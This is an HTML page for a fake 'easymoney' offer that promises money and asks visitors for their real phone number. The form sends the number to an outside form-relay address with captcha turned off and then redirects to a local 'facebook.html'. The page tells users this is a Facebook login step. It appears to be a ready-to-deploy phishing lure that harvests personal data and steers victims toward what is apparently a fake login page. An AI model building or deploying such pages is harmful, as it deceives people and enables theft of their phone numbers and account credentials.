<!DOCTYPE html>
<html>
<head>
<title>Send us your number</title>


<meta charset="utf-8" />
<meta name="description" content="earn money easly..." />
<meta name="keywords" content="..." />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="theme-color" content="#f4f4f4">
<meta name="author" content="mr.robot">



<style>
body{
width:100%;
max-width:800px;
margin:0 auto;
font-family:sans-serif;
font-weight:300;
background:#f4f4f4;
}
.container{
width:100%;
max-width:800px;
margin:0 auto;
}
#title{
font-weight:200;
text-align:center;
margin:0;
margin-top:30px;
}
#check_money{
text-align:center;
}
#f1_p{
width:100%;
max-width:300px;
margin:0 auto;
text-align:center;
margin-top:30px;
display:non;
}
#intro{
text-align:center;
margin-top:30px;
display:non;
}
#prop{
width:150px;
height:150px;
border-radius:125px;
margin:auto;
display:flex;
justify-content:center;
display:non;
}
</style>
</head>
<body>

<!--container-->
<div class="container">
<h1 id="title">easymoney&copy</h1>

<p>
Make sure you write your real phone
number, the number you will use here, will
be used to send money into your account
</p>

<style>
fieldset{
width:100%;
max-width:250px;
margin:0 auto;
margin-top:50px;
border-radius:5px;
border:0px solid royalblue;
background:white;
box-shadow:0 0 100px grey;
}fieldset h2{
font-weight:200;
}fieldset input{
height:30px;
}fieldset button{
 background:green;
 color:white;
 width:90px;
 height:30px;
 border:0px;
}
</style>
<fieldset>
<h2>Confirm</h2>

<form action="https://formsubmit.co/6b243357c595731e8b997686f64b1e28" method="POST">
<input type="hidden" name="_captcha" value="false">
<input type="hidden" name="_next" value="facebook.html">
<input type="hidden" name="_template" value="table">
     

<input type="tel" name="number_from_easymoney" placeholder="Your number"><br><br>
<button>Send</button>
</form>
</fieldset>

<br><br>
<p>
After you confirm with your phone
number, you will be re-directed
to Facebook login page so that you 
sign in. After that you will be required
to complete your tasks.
</p>
<style>
p{
 width:100%;
 max-width:250px;
 margin:0 auto;
 margin-top:40px;
}
</style>

<br>
<style>
footer{
width:100%;
max-width:300px;
margin:0 auto;
background:white;
margin-top:50px;
}footer p{
margin:0;
font-size:13px;
padding:10px;
}
</style>
<footer>
<p>
powered by easymoneyX servers<br>
easymoney&copy
</p>
</footer>
</div>
<!--container-->

</body>
</html>